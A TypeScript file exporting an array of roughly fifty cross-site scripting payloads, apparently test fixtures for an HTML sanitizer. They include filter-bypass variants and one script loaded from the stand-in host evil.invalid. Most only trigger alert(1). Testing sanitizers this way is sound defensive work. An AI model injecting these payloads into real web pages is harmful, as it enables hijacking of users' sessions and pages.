export const xssCorpus = [
  '<script>alert(1)</script>', '<SCRIPT SRC=https://evil.invalid/x.js></SCRIPT>',
  '<script/x>alert(1)</script>', '<scr<script>ipt>alert(1)</scr</script>ipt>',
  '<img src=x onerror=alert(1)>', '<img src="x" oNeRrOr="alert(1)">',
  '<img src="javascript:alert(1)">', '<img src="data:image/svg+xml,<svg onload=alert(1)>">',
  '<img srcset="x 1x, javascript:alert(1) 2x">', '<img src="x" onload="alert(1)">',
  '<svg onload=alert(1)>x</svg>', '<svg><script>alert(1)</script></svg>',
  '<svg><a xlink:href="javascript:alert(1)">x</a></svg>', '<math><mtext><img src=x onerror=alert(1)></mtext></math>',
  '<math href="javascript:alert(1)">x</math>', '<iframe src="javascript:alert(1)"></iframe>',
  '<iframe srcdoc="<script>alert(1)</script>"></iframe>', '<object data="javascript:alert(1)"></object>',
  '<embed src="data:text/html,<script>alert(1)</script>">', '<form action="javascript:alert(1)"><button>go</button></form>',
  '<a href="javascript:alert(1)">click</a>', '<a href="JaVaScRiPt:alert(1)">click</a>',
  '<a href="&#106;avascript:alert(1)">click</a>', '<a href="java\nscript:alert(1)">click</a>',
  '<a href="vbscript:msgbox(1)">click</a>', '<a href="data:text/html,<script>alert(1)</script>">click</a>',
  '<a href="file:///etc/passwd">file</a>', '<a href="blob:https://evil.invalid/id">blob</a>',
  '<div onclick="alert(1)">x</div>', '<div onmouseover="alert(1)">x</div>',
  '<body onload=alert(1)>x</body>', '<input autofocus onfocus=alert(1)>',
  '<details open ontoggle=alert(1)>x</details>', '<marquee onstart=alert(1)>x</marquee>',
  '<video><source onerror="alert(1)"></video>', '<audio src=x onerror=alert(1)>',
  '<style>@import "javascript:alert(1)";</style>', '<link rel=stylesheet href="javascript:alert(1)">',
  '<meta http-equiv=refresh content="0;javascript:alert(1)">', '<base href="javascript:alert(1)//">',
  '<table background="javascript:alert(1)"><tr><td>x</td></tr></table>', '<div style="background:url(javascript:alert(1))">x</div>',
  '<p data-x="payload" onpointerenter=alert(1)>x</p>', '<button formaction="javascript:alert(1)">x</button>',
  '<textarea autofocus onfocus=alert(1)>x</textarea>', '<select autofocus onfocus=alert(1)><option>x</option></select>',
  '<!--><img src=x onerror=alert(1)>-->', '<![CDATA[<script>alert(1)</script>]]>',
  '<noscript><img src=x onerror=alert(1)></noscript>', '<template><img src=x onerror=alert(1)></template>',
] as const
